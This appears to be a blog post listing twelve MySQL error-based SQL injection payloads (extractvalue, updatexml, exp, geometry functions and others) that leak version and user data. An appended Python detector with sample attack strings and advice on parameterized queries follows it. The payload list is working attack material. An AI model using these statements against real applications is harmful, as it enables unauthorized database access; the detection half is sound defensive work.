Tag Archives: SQL Error Injection

12 Methods of SQL Error Injection [How to Inject]

1. An error is reported through floor(), and the injection statement is as follows:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2. An error is reported through extractvalue, and the injection statement is as follows:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. An error is reported through updatexml, and the injection statement is as follows:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4. An error is reported through name_const(), and the injection statement is as follows:

and exists(select * from (select * from (select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

5. An error is reported through the join, and the injection statement is as follows:

select * from (select * from mysql.user a join mysql.user b)c;

6. An error is reported through exp(), and the injection statement is as follows:

and exp(~(select * from (select user())a));

7. An error is reported through geometrycollection(). The injection statement is as follows:

and GeometryCollection((select * from (select * from (select user())a)b));

8. An error is reported through polygon(), and the injection statement is as follows:

and polygon((select * from (select * from (select user())a)b));

9. An error is reported through multipoint(), and the injection statement is as follows:

and multipoint((select * from (select * from (select user())a)b));

10. An error is reported through multilinestring(), and the injection statement is as follows:

and multilinestring((select * from (select * from (select user())a)b));

11. An error is reported through multipolygon(), and the injection statement is as follows:

and multipolygon((select * from (select * from (select user())a)b));

12. An error is reported through linestring(), and the injection statement is as follows:

and linestring((select * from (select * from (select user())a)b));

The sixth and twelfth are used more often because the statements are short and are less likely to be restricted.
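
A defensive counterpart to the list above, as an added example that is not part of the original post: a Python matcher that normalizes a request parameter value (layered URL-encoding, comment padding) and flags the function families the twelve statements rely on. The signature names, regexes and sample values are constructions of this example.

```python
import re
from urllib.parse import unquote_plus

# Patterns are this example's own, one per technique family in the list above.
GEOM = r"(?:geometrycollection|multipoint|multilinestring|multipolygon|polygon|linestring)"
SIGNATURES = {
    "floor(rand()) group by": r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b",
    "extractvalue": r"\bextractvalue\s*\(",
    "updatexml": r"\bupdatexml\s*\(",
    "name_const": r"\bname_const\s*\(",
    "self-join in derived table": r"from\s*\(\s*select\s*\*\s*from\s+\S+\s+\w+\s+join\b",
    "exp(~subquery)": r"\bexp\s*\(\s*~",
    "geometry function on subquery": r"\b" + GEOM + r"\s*\(\s*\(\s*select\b",
}
COMPILED = {name: re.compile(rx, re.S) for name, rx in SIGNATURES.items()}

def normalize(value: str) -> str:
    """Undo layered URL-encoding and comment padding before matching."""
    for _ in range(3):  # bounded number of rounds: covers double encoding
        value = unquote_plus(value)
    # MySQL executes the body of /*!NNNNN ... */, so keep the body.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Plain /* ... */ comments only act as whitespace, so drop them.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def classify(value: str) -> list:
    """Return the name of every signature found in one parameter value."""
    text = normalize(value)
    return [name for name, rx in COMPILED.items() if rx.search(text)]

# Constructed parameter values; the flagged ones reuse statements from the list.
SAMPLES = [
    "42",
    "floor plans for group bookings",
    "1 and exp(~(select * from (select user())a))",
    "1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1))",
    "1 and/**/ExtractValue/**/(1,concat(0x5c,(select user())))",
    "1%2520and%2520linestring((select%2520*%2520from(select%2520*%2520from(select%2520user())a)b))",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{classify(s) or 'clean'!s:45} {s[:60]}")
```

Matching like this is a detection aid for logs or filtering rules. Parameterized queries and keeping database error text out of responses are what remove the channel these statements depend on.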